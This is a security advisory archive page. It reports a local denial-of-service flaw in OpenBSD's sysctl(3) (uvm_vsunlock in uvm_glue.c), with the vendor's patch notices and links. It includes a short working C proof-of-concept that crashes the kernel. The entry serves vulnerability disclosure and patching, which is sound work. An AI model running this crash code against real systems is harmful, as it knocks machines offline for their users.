SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   OS (UNIX)  >   OpenBSD Kernel Vendors:   OpenBSD
(Vendor Issues Fix) Re: OpenBSD sysctl(3) Flaw Lets Local Users Crash the System
SecurityTracker Alert ID:  1008272
SecurityTracker URL:  http://securitytracker.com/id/1008272
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Nov 21 2003
Impact:   Denial of service via local system
Fix Available:  Yes  Vendor Confirmed:  Yes  
Version(s): OpenBSD 3.4 and prior versions
Description:   A vulnerability was reported in OpenBSD in the sysctl(3) function. A local user can cause the system to crash.

It is reported that a local user can call sysctl(3) with certain arguments to cause the kernel to crash.

The flaw reportedly resides in 'uvm_glue.c' in uvm_vsunlock().

The following demonstration exploit code was provided in a different report:

#include <stdio.h>
#include <sys/param.h>
#include <sys/sysctl.h>

int main ()
{
unsigned int blah[2] = { CTL_KERN, 0 }, addr = -4096 + 1;

return (sysctl (blah, 2, (void *) addr, &blah[1], 0, 0));
}

Impact:   A local user can cause the system to crash.
Solution:   OpenBSD has issued the following fixes for OpenBSD 3.4 and 3.3:

ftp://ftp.openbsd.org/pub/OpenBSD/patches/3.4/common/007_uvm.patch
ftp://ftp.openbsd.org/pub/OpenBSD/patches/3.3/common/012_uvm.patch

Vendor URL:  www.openbsd.org/ (Links to External Site)
Cause:   Boundary error

Message History:   This archive entry is a follow-up to the message listed below.
Nov 21 2003 OpenBSD sysctl(3) Flaw Lets Local Users Crash the System



 Source Message Contents

Subject:  OpenBSD bugs


 > 008: RELIABILITY FIX: November 20, 2003
 > An improper bounds check makes it possible for a local user to cause a crash by
 > passing the semctl(2) and semop(2) functions certain arguments.
 > A source code patch exists which remedies the problem.

ftp://ftp.openbsd.org/pub/OpenBSD/patches/3.4/common/008_sem.patch
ftp://ftp.openbsd.org/pub/OpenBSD/patches/3.3/common/013_sem.patch

 > 007: RELIABILITY FIX: November 20, 2003
 > It is possible for a local user to cause a crash via sysctl(3) with certain arguments.
 > A source code patch exists which remedies the problem.

ftp://ftp.openbsd.org/pub/OpenBSD/patches/3.4/common/007_uvm.patch
ftp://ftp.openbsd.org/pub/OpenBSD/patches/3.3/common/012_uvm.patch



 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC